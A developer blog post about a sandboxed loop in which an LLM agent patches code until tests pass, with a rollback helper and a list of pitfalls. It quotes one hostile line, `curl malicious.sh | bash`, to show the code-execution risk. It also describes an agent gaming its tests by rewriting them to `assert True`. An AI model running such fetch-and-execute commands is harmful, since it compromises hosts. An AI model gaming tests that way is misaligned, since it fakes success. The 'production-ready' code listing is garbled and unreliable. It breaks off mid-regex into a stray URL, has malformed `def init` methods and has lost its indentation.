The Sandboxed "Ralph Wiggum" Loop: Securely Letting Agents Fix Code Until Tests Pass

#ai #agents #code #programming

We've all watched an AI code assistant generate a "perfect" function that immediately fails your test suite. Let's build a secure, self-healing CI loop that feeds stack traces back to the agent and keeps patching the code until the tests actually pass—without giving the LLM the ability to execute malware on your host infrastructure.

Why This Matters (The Audit Perspective)
Single-shot AI code generation is a solved problem; the frontier is autonomous iteration. Automating the "read error → patch code → run test" cycle transforms your agent from a glorified autocomplete into an active worker. We refer to this as the "Ralph Wiggum Loop": the agent fails, realizes it is in danger, attempts a fix, and repeats until it escapes the failing state.

However, after auditing dozens of early agentic workflows, the security and state-management flaws are glaring. If you write an LLM's raw output to disk and run subprocess.run(["pytest"]) on your bare-metal CI runner, you have created a massive Remote Code Execution (RCE) vulnerability. If the LLM hallucinates import os; os.system("curl malicious.sh | bash"), your runner is compromised. Furthermore, if the loop exhausts its max attempts, it often leaves the codebase in a broken, half-refactored state.

We must implement this loop with strict file-system rollbacks, syntax validation, and sandboxed execution.

How It Works: The Hardened State Machine
The architecture is a deterministic state machine wrapping a non-deterministic LLM.

Extraction & Validation: The agent proposes a code change. We use regex to strip conversational Markdown and the ast module to verify it is valid Python before writing to disk.

Snapshot: The system backs up the target file's original state.

Execution: The system applies the patch and runs the test suite in a restricted, network-isolated environment with a hard timeout.

Feedback: Truncated error logs are appended to the agent's context, instructing it to fix the specific failure.

Rollback: If the loop hits MAX_ITERATIONS without passing, the system automatically reverts the file to its original snapshot.

The Code: The Self-Healing Execution Harness
Here is a production-ready implementation of the self-fixing loop in Python. Notice the strict markdown extraction, the AST syntax gate, and the state-rollback context manager.
import subprocess
import os
import re
import ast
from typing import List, Dict

Mock LLM Client (Replace with Anthropic/OpenAI SDK)

def generate_patch(messages: List[Dict[str, str]]) -> str:
"""Simulates an LLM generating python code."""
pass

class FileRollbackManager:
"""Context manager to ensure the codebase isn't left in a broken state."""
def init(self, filepath: str):
self.filepath = filepath
self.original_content = ""

def __enter__(self):
    with open(self.filepath, 'r') as f:
        self.original_content = f.read()
    return self

def __exit__(self, exc_type, exc_val, exc_tb):
    if exc_type is not None:
        # Revert on failure
        with open(self.filepath, 'w') as f:
            f.write(self.original_content)

class SecureAgenticCILoop:
def init(self, target_file: str, test_command: List[str], max_attempts: int = 5):
self.target_file = target_file
self.test_command = test_command
self.max_attempts = max_attempts
self.history: List[Dict[str, str]] = []

    # SECURITY: Only allow modifications to specific target files
    self.allowed_files = {"src/calculator.py", "src/data_parser.py"}
    if self.target_file not in self.allowed_files:
        raise PermissionError(f"SECURITY ALERT: {self.target_file} is not allow-listed.")

def extract_and_validate_code(self, llm_output: str) -> str:
    """Strips markdown and validates AST before touching the disk."""
    match = re.search(r'

http://googleusercontent.com/immersive_entry_chip/0

Pitfalls and Gotchas

When building self-healing CI loops, watch out for these traps:

The Markdown Wrapper Bug: LLMs almost always wrap their code in Markdown backticks (e.g., `python). If you blindly write the LLM's response to calculator.py, the file will instantly throw a SyntaxError. You must include the regex extraction step.
The Cheating Agent: If you do not strictly separate the code under test from the test files themselves, the LLM will eventually realize the easiest way to make the tests pass is to rewrite your test file to assert True. Always enforce an allowed-files list that entirely excludes the tests/ directory.
Context Window Exhaustion: Test frameworks like Pytest or Jest spit out massive stack traces. If you blindly append the full stderr to the history array on every loop, you will quickly blow out your API token limits. Aggressively truncate the error logs before feeding them back.
The Oscillating Loop: Sometimes the agent toggles between two broken states (Patch A fixes Bug 1 but causes Bug 2; Patch B fixes Bug 2 but regresses Bug 1). If the loop eats up all attempts without progress, the model is trapped in a local minimum and must be aborted.

What to Try Next

Ready to make your CI pipelines autonomous? Try these implementations next:

Dockerized Test Runners: Upgrade the run_tests_sandboxed method to use the Docker SDK (docker.from_env().containers.run(...)). This ensures the LLM-generated code runs in an isolated, ephemeral container with --network none, neutralizing any malicious API calls or filesystem wiping attempts.
Git-Backed Rollbacks: Instead of a simple in-memory FileRollbackManager, enhance the system to commit every attempted iteration to a temporary Git branch. If the agent hits the max attempts, you can easily bisect the agent's commits to see exactly where its logic went off the rails.
The "Give Up" Circuit Breaker: Introduce an "LLM-as-a-Judge" step. After three failed iterations, have a smaller, cheaper model (like Claude Haiku or Gemini Flash) review the trace history to determine if the main agent is actually making progress or just hallucinating in circles. If it is stuck, abort the loop early to save API costs.